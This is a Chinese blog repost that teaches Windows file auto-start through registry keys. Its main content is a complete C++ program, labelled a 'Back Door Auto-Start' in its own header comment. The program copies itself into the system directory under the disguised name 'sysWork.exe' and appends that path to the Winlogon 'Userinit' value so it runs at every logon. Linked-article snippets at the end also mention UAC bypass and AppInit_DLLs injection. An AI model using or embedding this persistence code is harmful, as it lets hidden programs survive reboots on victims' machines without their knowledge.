安全之路 —— C/C++实现利用添加注册表项实现文件自启动

最新推荐文章于 2023-01-31 00:25:00 发布
最新推荐文章于 2023-01-31 00:25:00 发布
阅读量165 收藏
点赞数
文章标签: c/c++ 操作系统
原文链接:http://www.cnblogs.com/PeterZ1997/p/9531724.html
版权

简介

添加注册表项是实现文件自启动的经典方法之一,但因为操作注册表项是一个敏感操作,被报毒可能性较大,但即便如此,这个方法还是值得一学的,因为后期大部分编程都涉及到注册表操作。


最常使用到的注册表项有两项:

  1. "HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows"“load”键下的键值改为自启动目标文件路径,但缺点在于只能支持一个程序;
  2. "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon"“Userinit”键下的值加上自启动目标文件路径,但是要注意虽然支持多文件自启动,但每个文件路径之间切记要用逗号隔开


C++代码样例

//
//
// FileName : RegAutoRunDemo.cpp
// Creator : PeterZ1997
// Date : 2018-5-1 21:34
// Comment : Add registry key(s) to achieve the Back Door Auto-Start
//
//

#include <cstdio>
#include <iostream>
#include <windows.h>
#include <cstdlib>
#include <cstring>

using namespace std;

const unsigned int MAX_COUNT = 255; /// Max String Length

CHAR szRegInfo[MAX_COUNT] = "\0";

/**
* @brief Determine if it is a substring
* @param str1 String-1
* @param str2 String-2
* @return Boollean Value
*/
BOOL IsSubString(LPCTSTR str1, LPCSTR str2)
{
    CHAR szTempStr01[MAX_COUNT] = "\0";
    CHAR szTempStr02[MAX_COUNT] = "\0";
    if (strlen(str1) < strlen(str2))
    {
        strcpy_s(szTempStr02, sizeof(szTempStr01), str1);
        strcpy_s(szTempStr01, sizeof(szTempStr02), str2);
    }
    else
    {
        strcpy_s(szTempStr01, sizeof(szTempStr01), str1);
        strcpy_s(szTempStr02, sizeof(szTempStr02), str2);
    }
    for (int i = 0; i < strlen(szTempStr01) - strlen(szTempStr02); i++)
    {
        for (int j = 0; j < strlen(szTempStr02); j++)
        {
            if (*(szTempStr01 + j + i) != *(szTempStr02 + j))
            {
                break;
            }
            if (*(szTempStr01 + j + i) == *(szTempStr02 + j) && j == strlen(szTempStr02) - 1)
            {
                return true;
            }
        }
    }
    return false;
}

/**
* @brief Add a string key to Registry
* @param hRoot root key
* @param szSubKey sub key after the root key
* @param szValueName key name
* @param szData key Data
* @return Boollean Value
*/
BOOL setStringToReg(HKEY hRoot, LPCTSTR szSubKey, LPCTSTR szValueName, LPCTSTR szData)
{
    HKEY hKey;
    LONG lRes = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
    if (lRes != ERROR_SUCCESS)
    {
        RegCloseKey(hKey);
        RegCloseKey(hRoot);
        return false;
    }
    lRes = RegSetValueEx(hKey, szValueName, 0, REG_SZ, (BYTE*)szData, strlen(szData));
    if (lRes != ERROR_SUCCESS)
    {
        RegCloseKey(hKey);
        RegCloseKey(hRoot);
        return false;
    }
    RegCloseKey(hKey);
    RegCloseKey(hRoot);
    return true;
}

/**
* @brief Get key info
* @param hRoot root key
* @param szSubKey sub key after the root key
* @param szValueName key name
* @return Boollean Value
*/
BOOL getRegInfo(HKEY hRoot, LPCTSTR szSubKey, LPCTSTR szValueName)
{
    HKEY hKey;
    DWORD dwType = REG_SZ;
    DWORD dwLenData = strlen(szRegInfo);
    LONG lRes = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
    if (lRes != ERROR_SUCCESS)
    {
        RegCloseKey(hKey);
        RegCloseKey(hRoot);
        return false;
    }
    RegQueryValueEx(hKey, szValueName, 0, &dwType, NULL, &dwLenData);
    lRes = RegQueryValueEx(hKey, szValueName, 0, &dwType, (LPBYTE)szRegInfo, &dwLenData);
    if (lRes != ERROR_SUCCESS)
    {
        RegCloseKey(hKey);
        RegCloseKey(hRoot);
        return false;
    }
    RegCloseKey(hKey);
    RegCloseKey(hRoot);
    return true;
}

/**
* @brief Main Function
*/
int WINAPI WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPSTR lpCmdLine, _In_ int nShowCmd)
{
    CHAR szSystemPath[MAX_COUNT] = "\0";
    CHAR szFilePath[MAX_COUNT] = "\0";
    CHAR szRegValue[MAX_COUNT] = "\0";
    CHAR szTotalString[MAX_COUNT] = "\0";
    if (getRegInfo(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "Userinit")) strcat_s(szRegValue, sizeof(szRegValue), szRegInfo);
    else return 0;
    for (int i = 1;;)
    {
        if (szRegValue[strlen(szRegValue) - i] == ' ')
        {
            szRegValue[strlen(szRegValue) - i] = '\0';
        }
        else
        {
            break;
        }
    }
    if (szRegValue[strlen(szRegValue) - 1] != ',') strcat_s(szRegValue, sizeof(szRegValue), ",");
    strcat_s(szTotalString, sizeof(szTotalString), szRegValue);
    if (!IsSubString(szTotalString, "C:\\Windows\\SysWOW64\\sysWork.exe"))
    {
        strcat_s(szTotalString, sizeof(szTotalString), "C:\\Windows\\SysWOW64\\");
        strcat_s(szTotalString, sizeof(szTotalString), "sysWork.exe,");
    }
    GetSystemDirectory(szSystemPath, sizeof(szSystemPath));
    strcat_s(szSystemPath, sizeof(szSystemPath), "\\sysWork.exe");
    if (!IsSubString(szRegValue, szSystemPath))
    {
        strcat_s(szTotalString, sizeof(szTotalString), szSystemPath);
        strcat_s(szTotalString, sizeof(szTotalString), ",");
    }
    GetModuleFileName(NULL, szFilePath, sizeof(szFilePath));
    if (strcmp(szFilePath, szSystemPath) && strcmp(szFilePath, "C:\\Windows\\SysWOW64\\sysWork.exe"))
    {
        if (!CopyFile(szFilePath, szSystemPath, true)) return 0;
        if (!setStringToReg(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "Userinit", szTotalString)) return 0;
    }
    MessageBox(NULL, "HelloWorld", "Tips", MB_OK);
    ExitProcess(0);
    return 0;
}

转载于:https://www.cnblogs.com/PeterZ1997/p/9531724.html

dengdao1372
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
C/C++新建注册表的代码示例
01-01
使用Windows API 函数中的RegCreateKeyEx函数来实现注册表新建注册表。 RegCreateKeyEx函数: 原形:LONG RegCreateKeyEx( HKEY hKey, // 主键名称 LPCTSTR lpSubKey, // 子键名称或路径 DWORD Reserved, // 保留,为0 LPTSTR lpClass, // 一般设置为NULL DWORD dwOptions, /* 对你建立的键的一些选,可以是这些值:REG_OPTION_NON_VOLATILE,REG_OPTION_VOLATILE
C++注册表实例
12-25
本文实例讲述了C++注册表实现开机启动的方法。分享给大家供大家参考。 具体实现方法如下: 代码如下:void SelfRun(LPSTR lpszValueName) //lpszValueName 显示的名称  {      LPCTSTR lpSubKey = “Software\\Microsoft\\Windows\\CurrentVersion\\Run”;      HKEY hKey;      DWORD dwDisposition = REG_OPENED_EXISTING_KEY;      //打开注册表      LONG lRet = ::RegCr
C/C++新建注册表【代码示例】
Python | Golang | C/C++
11-17 6680
使用Windows API 函数中的RegCreateKeyEx函数来实现注册表新建注册表。 RegCreateKeyEx函数: 原形:LONGRegCreateKeyEx( HKEYhKey,//主键名称 LPCTSTRlpSubKey,//子键名称或路径 DWORD...
用Visual C++实现注册表简单操作
tanfenghua的专栏
12-27 816
          Windows的注册表中包含了Windows的系统配置、PC机的硬件配置、Win32应用程序和用户的其他设置信息。注册表和INI文件不同,它是多层次的树状数据结构,具有六个分支(根键),每个分支又由许多的键和键值组成,而每个键则代表一个特定的配置目。在注册表中键可以包括子键和值。我们可以对他做个比喻,键就是目录,而子键和值可以看成文件,这样比喻可能不科学但是很实际。在Wind
c c++操作windows的注册表
j_shui的博客
03-15 393
示例代码如下: #include <iostream> #include <atlbase.h> #include <Windows.h> using namespace std; int main() { HKEY hKey = NULL; DWORD dwDisposition; LPCTSTR subKey = _T("SOFTWARE\\Foxit Software\\Foxit"); DWORD dwOptions = REG_OPTION_NO
dlab.zip_guspatch_自启动
09-23
描述中的“通过注册表实现自启动的程序,随系统的运行而运行”提到了关键知识点——利用Windows注册表来设置程序的自启动。在Windows操作系统中,很多程序可以通过在特定的注册表键值下添加启动实现在用户登录或...
注册表操作实例——电脑前工作时间提醒(关注健康)
07-23
本文将通过“注册表操作实例——电脑前工作时间提醒”这一主题,深入探讨如何利用C++和MFC进行注册表操作,以实现对用户工作习惯的智能提醒,关注健康。 首先,我们要理解注册表是Windows操作系统中的核心数据库,...
C++Builder中注册表的操作
05-17
`TRegistry`类提供了多种方法来读取、写入和管理注册表: 1. **CloseKey()**: 关闭当前键并提交更改。通常情况下,无需显式调用此方法,因为`TRegistry`的析构函数会自动调用它。 2. **DeleteKey(AnsiString)**: ...
程序开机运行的MFC实现
07-10
在提供的压缩包文件"实例249——使程序开机自动运行"中,应该包含了实现这一功能的源代码示例。你可以下载并研究这些代码,了解它们是如何整合到MFC应用程序中的。通过学习这个实例,你可以更好地理解C++和MFC如何与...
实例249——使程序开机自动运行
05-27
总结起来,通过MFC的`CRegKey`类,我们可以方便地管理Windows注册表实现程序的开机自启动。但要注意安全性和用户权限,确保这一功能的合理使用。在实际开发中,还可以结合其他技术如服务、计划任务等,根据具体...
c++ 操作注册表
andy76123的博客
09-25 323
1. 注册表简介 注册表是为Windows NT和Windows95中所有32位硬件/驱动和32位应用程序设计的数据文件,用于存储系统和应用程序的设置信息。16位驱动在Winnt (Windows New Technology)下无法工作,所以所有设备都通过注册表来控制,一般这些是通过BIOS(基本输入输出系统)来控制的。在Win95下,16位驱动会继续以实模式方式设备工作...
c语言里向注册表添加启动的命令是什么,c++注册表方式让程序开机自启动...
weixin_39994665的博客
05-20 297
打开注册表:win+R, 输入regedit 点击确定你会看到五个根目录,开机自启动的信息写在 HKEY_LOCAL_MACHINE 下面,具体的目录为 SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run要怎么将开机自启动的信息写入注册表中呢?其实过程很简单,第一步,打开注册表,第二步,写注册表,第三步,关闭键的句柄打开注册表要使用RegOpenKe...
可以绕过 Windows UAC 吗
最新发布
langshanglibie的专栏
01-31 1580
Windows 系统安全机制并非固若金汤。通过 COM 提升名称方法,程序可以绕过其核心安全机制 UAC 而获取到系统管理员权限。
Win7,Win8,Win10 UAC绕行方法
物知馆
09-14 743
应用程序启动System32/CompMgmtLaucher.exe(即启动计算机管理),计算机管理运行时,计算机管理会读取注册表HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command下缺省值的内容(事先写好)并运行该内容,然后删除该内容。 举例:假设注册表的缺省值为某一软件B.exe的路径,那计算机管理启动后就会运行B.
获取本地物理MAC地址(方法一)
shiwujigegea的博客
08-17 309
#include <cstdio> #include <cstdlib> #include <iostream> #include <strsafe.h> #include <WinSock2.h> #include <Iphlpapi.h> #include <cstring> #pragma comment(lib,"Iphlpapi.lib") using namespace std; BOOL GetRegInf.
一、C++反作弊对抗实战 (基础篇 —— 2.注册表注入DLL)
Koma的主页
03-02 749
在Windows NT/XP操作系统中,当需要加载user32.dll的程序启动时,user32.dll会加载注册表键HLM\Software\Microsoft\WindowsNT\CurrentVersion\Windows\AppInit_dlls下面列出的所有模块。
Windows C++ 读写注册表
lizfs_csdn的博客
04-13 375
const char* sub_key = "Software\\demo_cache"; 函数定义: bool SetValue(const std::string& key, const std::string& value) { HKEY hkey = nullptr; LSTATUS res = ::RegOpenKeyExA(HKEY_CURRENT_USER, sub_key, 0, KEY_WRITE, &hkey); if (res != E...
VC++操作注册表(创建,读取,更改,删除)
码农code之路
09-07 8943
#include "stdafx.h" #include &lt;Windows.h&gt; #include &lt;iostream&gt; using namespace std; /************************************ @ Brief: 打开注册表,读取Key对应value @ Author: woniu201 @ Created: 20...
C/C++深度剖析:面试通关秘籍——C语言关键字详解
《C/C++语言深度剖析——C语言关键字详解》是一本由陈正冲编著、石虎审阅的专业书籍,针对C语言的关键字进行了深入且详细的解读。这本书不仅适合程序员面试笔试准备,也是C语言学习者的宝贵参考资料。作者以其丰富的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值